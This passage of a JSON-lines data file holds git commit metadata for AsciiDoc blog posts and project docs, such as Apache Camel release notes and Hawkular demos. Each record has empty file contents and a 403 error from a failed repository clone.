2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6321c016b8aa8e61086ec3fb6e1f5607b7e2ef41","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13316512719981cded2015c4b6b3552d484ef1d4","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"812d8b52252f373bb144ac7915d9812fd1bc36c6","subject":"y2b create post The 
Best Keyboard... Now Even Better?","message":"y2b create post The Best Keyboard... Now Even Better?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-10-The-Best-Keyboard-Now-Even-Better.adoc","new_file":"_posts\/2016-09-10-The-Best-Keyboard-Now-Even-Better.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3534feee455e75213b0f0bf7568e1e78f4a5e9e6","subject":"y2b create post How To Make Your iPhone Screen 3D","message":"y2b create post How To Make Your iPhone Screen 3D","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-14-How-To-Make-Your-iPhone-Screen-3D.adoc","new_file":"_posts\/2017-05-14-How-To-Make-Your-iPhone-Screen-3D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37e98e470aa3c6cb9ba7251794be44db967339a5","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53e8f57590ab528363e44bfd3c3cf13d3d7e0321","subject":"Update 2018-10-21-exercise-of-O-O-P.adoc","message":"Update 2018-10-21-exercise-of-O-O-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-exercise-of-O-O-P.adoc","new_file":"_posts\/2018-10-21-exercise-of-O-O-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26ed2c21e92c8f69772bfe4c90a2ff75f84baa9e","subject":"Update 2018-02-03-CODEGATE-CTF-2018-Red-Velvet-BabyRSA-Miro.adoc","message":"Update 2018-02-03-CODEGATE-CTF-2018-Red-Velvet-BabyRSA-Miro.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2018-02-03-CODEGATE-CTF-2018-Red-Velvet-BabyRSA-Miro.adoc","new_file":"_posts\/2018-02-03-CODEGATE-CTF-2018-Red-Velvet-BabyRSA-Miro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74dad19d1ca0200e9628243275a7a09e2c7e743b","subject":"Testing bed doc #24","message":"Testing bed doc 
#24","repos":"ocarriles\/sbc,ocarriles\/sbc,ocarriles\/sbc,ocarriles\/sbc","old_file":"docs\/src\/main\/asciidoc\/testing\/How to test Restcomm-SBC.adoc","new_file":"docs\/src\/main\/asciidoc\/testing\/How to test Restcomm-SBC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ocarriles\/sbc.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c1d9dc9d2f8ae62ca4537f7388a1a81e5f63be7d","subject":"Update 2018-03-26-Networkx-Spring-Layout-for-Directed-Graph-Di-Graph.adoc","message":"Update 2018-03-26-Networkx-Spring-Layout-for-Directed-Graph-Di-Graph.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2018-03-26-Networkx-Spring-Layout-for-Directed-Graph-Di-Graph.adoc","new_file":"_posts\/2018-03-26-Networkx-Spring-Layout-for-Directed-Graph-Di-Graph.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8670611f779819250ef1b71c4a4a1fe919af355","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c255bbc84ac3623396dadaac904ed6c04b294b3f","subject":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","message":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4afdef70859b326db81c396654d37c620026908","subject":"Delete the file at '_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","message":"Delete the file at '_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c3c058adf8fc39fae58dec5de9f02fa009056e2","subject":"Forget to add the zipfile docs directory to repo","message":"Forget to add the zipfile docs directory to 
repo\n","repos":"hqstevenson\/camel,nboukhed\/camel,gilfernandes\/camel,drsquidop\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,gautric\/camel,driseley\/camel,pkletsko\/camel,nikvaessen\/camel,driseley\/camel,lburgazzoli\/apache-camel,lburgazzoli\/apache-camel,sirlatrom\/camel,chirino\/camel,hqstevenson\/camel,chirino\/camel,borcsokj\/camel,jamesnetherton\/camel,tlehoux\/camel,borcsokj\/camel,adessaigne\/camel,acartapanis\/camel,bhaveshdt\/camel,mcollovati\/camel,isavin\/camel,tkopczynski\/camel,pmoerenhout\/camel,onders86\/camel,sverkera\/camel,kevinearls\/camel,rmarting\/camel,tkopczynski\/camel,nicolaferraro\/camel,sirlatrom\/camel,tadayosi\/camel,isavin\/camel,DariusX\/camel,onders86\/camel,driseley\/camel,tadayosi\/camel,chirino\/camel,yuruki\/camel,zregvart\/camel,sabre1041\/camel,ssharma\/camel,mcollovati\/camel,NickCis\/camel,hqstevenson\/camel,bhaveshdt\/camel,YoshikiHigo\/camel,scranton\/camel,isavin\/camel,pkletsko\/camel,drsquidop\/camel,RohanHart\/camel,pax95\/camel,pax95\/camel,curso007\/camel,w4tson\/camel,Fabryprog\/camel,onders86\/camel,akhettar\/camel,snurmine\/camel,cunningt\/camel,lburgazzoli\/apache-camel,neoramon\/camel,DariusX\/camel,cunningt\/camel,gilfernandes\/camel,anoordover\/camel,mgyongyosi\/camel,bhaveshdt\/camel,gnodet\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,apache\/camel,akhettar\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,jarst\/camel,ullgren\/camel,Fabryprog\/camel,lburgazzoli\/camel,Thopap\/camel,ssharma\/camel,apache\/camel,YoshikiHigo\/camel,ullgren\/camel,jlpedrosa\/camel,chirino\/camel,tdiesler\/camel,christophd\/camel,kevinearls\/camel,prashant2402\/camel,mgyongyosi\/camel,CodeSmell\/camel,anoordover\/camel,acartapanis\/camel,borcsokj\/camel,alvinkwekel\/camel,gnodet\/camel,gautric\/camel,christophd\/camel,curso007\/camel,scranton\/camel,sirlatrom\/camel,pmoerenhout\/camel,anton-k11\/camel,jonmcewen\/camel,onders86\/camel,neoramon\/camel,christophd\/camel,tdiesler\/camel,JYBESSON\/camel,gnodet\/camel,NickCis\/camel,pkletsko\/camel,jamesnetherton\/camel,ullgren\/camel,drsquidop\/camel,pmoerenhout\/camel,nikvaessen\/camel,veithen\/camel,jarst\/camel,adessaigne\/camel,scranton\/camel,nikvaessen\/camel,jonmcewen\/camel,acartapanis\/camel,rmarting\/camel,akhettar\/camel,jkorab\/camel,Fabryprog\/camel,scranton\/camel,drsquidop\/camel,objectiser\/camel,adessaigne\/camel,sabre1041\/camel,tdiesler\/camel,isavin\/camel,nboukhed\/camel,gnodet\/camel,tadayosi\/camel,sverkera\/camel,prashant2402\/camel,tadayosi\/camel,RohanHart\/camel,oalles\/camel,gilfernandes\/camel,jmandawg\/camel,jarst\/camel,anton-k11\/camel,pmoerenhout\/camel,davidkarlsen\/camel,jonmcewen\/camel,FingolfinTEK\/camel,jarst\/camel,allancth\/camel,veithen\/camel,neoramon\/camel,FingolfinTEK\/camel,lburgazzoli\/apache-camel,rmarting\/camel,snurmine\/camel,jmandawg\/camel,Thopap\/camel,bgaudaen\/camel,cunningt\/camel,FingolfinTEK\/camel,oalles\/camel,sverkera\/camel,objectiser\/camel,jkorab\/camel,isavin\/camel,ssharma\/camel,bgaudaen\/camel,mgyongyosi\/camel,acartapanis\/camel,zregvart\/camel,tdiesler\/camel,alvinkwekel\/camel,anton-k11\/camel,chirino\/camel,objectiser\/camel,pmoerenhout\/camel,w4tson\/camel,yuruki\/camel,nicolaferraro\/camel,tdiesler\/camel,anoordover\/camel,curso007\/camel,gautric\/camel,gilfernandes\/camel,pmoerenhout\/camel,adessaigne\/camel,sirlatrom\/camel,tlehoux\/camel,drsquidop\/camel,jmandawg\/camel,apache\/camel,jlpedrosa\/camel,prashant2402\/camel,RohanHart\/camel,gautric\/camel,christophd\/camel,sabre1041\/camel,RohanHart\/camel,neoramon\/camel
,apache\/camel,oalles\/camel,drsquidop\/camel,gilfernandes\/camel,FingolfinTEK\/camel,anoordover\/camel,ssharma\/camel,prashant2402\/camel,jonmcewen\/camel,anton-k11\/camel,CodeSmell\/camel,dmvolod\/camel,sverkera\/camel,nikhilvibhav\/camel,gilfernandes\/camel,sabre1041\/camel,driseley\/camel,ssharma\/camel,yuruki\/camel,yuruki\/camel,tkopczynski\/camel,yuruki\/camel,lburgazzoli\/camel,acartapanis\/camel,tkopczynski\/camel,kevinearls\/camel,jamesnetherton\/camel,driseley\/camel,jamesnetherton\/camel,FingolfinTEK\/camel,snurmine\/camel,sirlatrom\/camel,tlehoux\/camel,w4tson\/camel,RohanHart\/camel,jlpedrosa\/camel,salikjan\/camel,anton-k11\/camel,apache\/camel,JYBESSON\/camel,bgaudaen\/camel,bhaveshdt\/camel,NickCis\/camel,tadayosi\/camel,kevinearls\/camel,pkletsko\/camel,chirino\/camel,snurmine\/camel,bgaudaen\/camel,jonmcewen\/camel,hqstevenson\/camel,gautric\/camel,rmarting\/camel,YoshikiHigo\/camel,allancth\/camel,kevinearls\/camel,nboukhed\/camel,snurmine\/camel,acartapanis\/camel,hqstevenson\/camel,NickCis\/camel,davidkarlsen\/camel,mgyongyosi\/camel,tdiesler\/camel,Fabryprog\/camel,lburgazzoli\/apache-camel,FingolfinTEK\/camel,w4tson\/camel,borcsokj\/camel,davidkarlsen\/camel,curso007\/camel,akhettar\/camel,jamesnetherton\/camel,jkorab\/camel,Thopap\/camel,davidkarlsen\/camel,Thopap\/camel,pkletsko\/camel,oalles\/camel,w4tson\/camel,pax95\/camel,gautric\/camel,hqstevenson\/camel,tlehoux\/camel,anoordover\/camel,driseley\/camel,mgyongyosi\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,adessaigne\/camel,YoshikiHigo\/camel,YoshikiHigo\/camel,tadayosi\/camel,sabre1041\/camel,ssharma\/camel,allancth\/camel,w4tson\/camel,alvinkwekel\/camel,veithen\/camel,onders86\/camel,cunningt\/camel,akhettar\/camel,pax95\/camel,Thopap\/camel,kevinearls\/camel,YoshikiHigo\/camel,sabre1041\/camel,JYBESSON\/camel,cunningt\/camel,christophd\/camel,JYBESSON\/camel,tkopczynski\/camel,jlpedrosa\/camel,apache\/camel,dmvolod\/camel,RohanHart\/camel,pax95\/camel,dmvolod\/camel,CodeSmell\/camel,tlehoux\/camel,scranton\/camel,bgaudaen\/camel,jmandawg\/camel,allancth\/camel,veithen\/camel,curso007\/camel,anoordover\/camel,punkhorn\/camel-upstream,allancth\/camel,neoramon\/camel,nboukhed\/camel,lburgazzoli\/camel,mgyongyosi\/camel,yuruki\/camel,gnodet\/camel,nboukhed\/camel,mcollovati\/camel,nikvaessen\/camel,jonmcewen\/camel,NickCis\/camel,lburgazzoli\/camel,adessaigne\/camel,JYBESSON\/camel,zregvart\/camel,nicolaferraro\/camel,lburgazzoli\/camel,ullgren\/camel,christophd\/camel,onders86\/camel,jkorab\/camel,jarst\/camel,jkorab\/camel,snurmine\/camel,JYBESSON\/camel,sirlatrom\/camel,jmandawg\/camel,cunningt\/camel,dmvolod\/camel,salikjan\/camel,akhettar\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,jlpedrosa\/camel,jlpedrosa\/camel,nikvaessen\/camel,pax95\/camel,isavin\/camel,jkorab\/camel,borcsokj\/camel,pkletsko\/camel,nboukhed\/camel,bgaudaen\/camel,jarst\/camel,veithen\/camel,scranton\/camel,sverkera\/camel,punkhorn\/camel-upstream,rmarting\/camel,bhaveshdt\/camel,curso007\/camel,anton-k11\/camel,lburgazzoli\/camel,nikhilvibhav\/camel,nikvaessen\/camel,DariusX\/camel,DariusX\/camel,Thopap\/camel,bhaveshdt\/camel,allancth\/camel,neoramon\/camel,prashant2402\/camel,jmandawg\/camel,dmvolod\/camel,veithen\/camel,tlehoux\/camel,oalles\/camel,prashant2402\/camel,rmarting\/camel,dmvolod\/camel,objectiser\/camel,sverkera\/camel,zregvart\/camel,oalles\/camel,borcsokj\/camel,mcollovati\/camel,NickCis\/camel","old_file":"components\/camel-zipfile\/src\/main\/docs\/zipfile.adoc","new_file":"components\/camel-zipfile\/src
\/main\/docs\/zipfile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"796f6369127b732bf27883972533d2f038df9e97","subject":"y2b create post Infamous 2 Hero Edition Unboxing (HD)","message":"y2b create post Infamous 2 Hero Edition Unboxing (HD)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-09-Infamous-2-Hero-Edition-Unboxing-HD.adoc","new_file":"_posts\/2011-06-09-Infamous-2-Hero-Edition-Unboxing-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31fd1c666e63e6b85bcf7b94487655479ae1bdb4","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb1cd99eb5841a9da8ce0ccb530acdcacf2c0167","subject":"Update 2016-11-15-Hacking-daily-nius-151116.adoc","message":"Update 2016-11-15-Hacking-daily-nius-151116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-15-Hacking-daily-nius-151116.adoc","new_file":"_posts\/2016-11-15-Hacking-daily-nius-151116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfb9a77c5220a5060c96637e32691d88f3dd36ca","subject":"Update 2017-08-10-tear-down-is-the-only-way.adoc","message":"Update 2017-08-10-tear-down-is-the-only-way.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-08-10-tear-down-is-the-only-way.adoc","new_file":"_posts\/2017-08-10-tear-down-is-the-only-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a76495d3c58d36cf9c20bb9b46cf36f7d9005d8","subject":"MiQ sprint demos.","message":"MiQ sprint 
demos.\n","repos":"jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/04\/08\/hawkular-manage-iq-sprint-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/04\/08\/hawkular-manage-iq-sprint-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a37e0b9fae09042f08720c518eced9f68444a13","subject":"Added some documentation about Smarti Components","message":"Added some documentation about Smarti Components\n","repos":"redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti","old_file":"docs\/components.adoc","new_file":"docs\/components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redlink-gmbh\/smarti.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad2995714bafd4fba07d42aca99092bb12b9cf22","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e188ccc32c98e79e4e490dd60ab4b51b104ea8c2","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01f88e44bb078db3ee20572fc4481f5a49328b8c","subject":"Proper Array and Object Access Patterns","message":"Proper Array and Object Access 
Patterns\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-xx-proper-array-and-object-access-patterns.adoc","new_file":"content\/news\/2017-07-xx-proper-array-and-object-access-patterns.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"667ed2e28f2bbfc7680a774232811e1d210dd4cc","subject":"y2b create post Nintendo 3DS Special Zelda Edition Unboxing","message":"y2b create post Nintendo 3DS Special Zelda Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-25-Nintendo-3DS-Special-Zelda-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-25-Nintendo-3DS-Special-Zelda-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e2552c59409e5ed78377e9406e7b3cdb40fe7c7","subject":"y2b create post This Cup Is Unspillable - What Magic Is This?","message":"y2b create post This Cup Is Unspillable - What Magic Is This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-03-This-Cup-Is-Unspillable--What-Magic-Is-This.adoc","new_file":"_posts\/2016-07-03-This-Cup-Is-Unspillable--What-Magic-Is-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32af142a9f721c5a98a0589564af9fc5d8d8bee4","subject":"Added Camel 2.18.3 release notes to docs","message":"Added Camel 2.18.3 release notes to 
docs\n","repos":"ullgren\/camel,adessaigne\/camel,pmoerenhout\/camel,jamesnetherton\/camel,Fabryprog\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,DariusX\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,christophd\/camel,nicolaferraro\/camel,sverkera\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,cunningt\/camel,jamesnetherton\/camel,tdiesler\/camel,apache\/camel,adessaigne\/camel,objectiser\/camel,jamesnetherton\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,kevinearls\/camel,pax95\/camel,alvinkwekel\/camel,pax95\/camel,sverkera\/camel,gnodet\/camel,nicolaferraro\/camel,gnodet\/camel,punkhorn\/camel-upstream,DariusX\/camel,christophd\/camel,anoordover\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,ullgren\/camel,sverkera\/camel,kevinearls\/camel,cunningt\/camel,onders86\/camel,zregvart\/camel,kevinearls\/camel,kevinearls\/camel,onders86\/camel,jamesnetherton\/camel,gnodet\/camel,gnodet\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,davidkarlsen\/camel,CodeSmell\/camel,pmoerenhout\/camel,apache\/camel,sverkera\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,apache\/camel,anoordover\/camel,sverkera\/camel,onders86\/camel,tdiesler\/camel,cunningt\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,tadayosi\/camel,mcollovati\/camel,christophd\/camel,zregvart\/camel,tdiesler\/camel,pax95\/camel,CodeSmell\/camel,christophd\/camel,objectiser\/camel,CodeSmell\/camel,anoordover\/camel,tdiesler\/camel,objectiser\/camel,ullgren\/camel,tadayosi\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,DariusX\/camel,cunningt\/camel,tadayosi\/camel,pmoerenhout\/camel,pmoerenhout\/camel,CodeSmell\/camel,Fabryprog\/camel,DariusX\/camel,onders86\/camel,alvinkwekel\/camel,onders86\/camel,onders86\/camel,davidkarlsen\/camel,alvinkwekel\/camel,alvinkwekel\/camel,anoordover\/camel,sverkera\/camel,adessaigne\/camel,Fabryprog\/camel,tdiesler\/camel,anoordover\/camel,objectiser\/camel,zregvart\/camel,christophd\/camel,cunningt\/camel,mcollovati\/camel,kevinearls\/camel,anoordover\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,zregvart\/camel,nicolaferraro\/camel,ullgren\/camel,Fabryprog\/camel,pax95\/camel,jamesnetherton\/camel,kevinearls\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2183-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2183-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bb93e3c6634cd1ac1f795e3f4cfbea66932d546","subject":"Update 2017-12-01-Simple-Note-in-Functional-Prog-in-Scala.adoc","message":"Update 2017-12-01-Simple-Note-in-Functional-Prog-in-Scala.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-12-01-Simple-Note-in-Functional-Prog-in-Scala.adoc","new_file":"_posts\/2017-12-01-Simple-Note-in-Functional-Prog-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eff5257d7f7b0137d3f2d1115770233b0ff72310","subject":"Update 2017-02-07-docker-compose-best-practices-part-2.adoc","message":"Update 
